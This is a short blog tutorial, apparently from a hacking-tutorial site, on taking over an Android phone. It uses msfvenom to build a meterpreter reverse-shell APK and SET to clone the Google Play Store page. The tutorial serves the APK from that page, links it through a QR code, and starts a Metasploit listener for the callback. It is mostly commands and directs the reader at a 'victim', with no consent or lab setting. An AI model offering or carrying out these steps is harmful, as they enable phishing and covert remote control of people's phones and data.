Hack Android Phone using HTA Attack with QR Code

QR Code is a 2 dimensional barcode which can be scanned using Smartphone’s or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when take over whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

Msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select 2nd option which indicates Website Attack Vectors?

Then further select 8th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type the said 2 option, it will ask you enter the URL that you want to clone. Here give the URL of play store: https://play.google.com/store

Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.

Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/

Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below

Now add The QR Code Extension to your chrome.

The QR Code Extension wills generate a QR Code for you according to your attack.

Now start multi/handler so you have your session in time and for this type:

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.100

set lport 6666

run

Now you can move ahead and make the victim scan your code. And install the app.

And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Related Posts Plugin for WordPress, Blogger...

Leave a Reply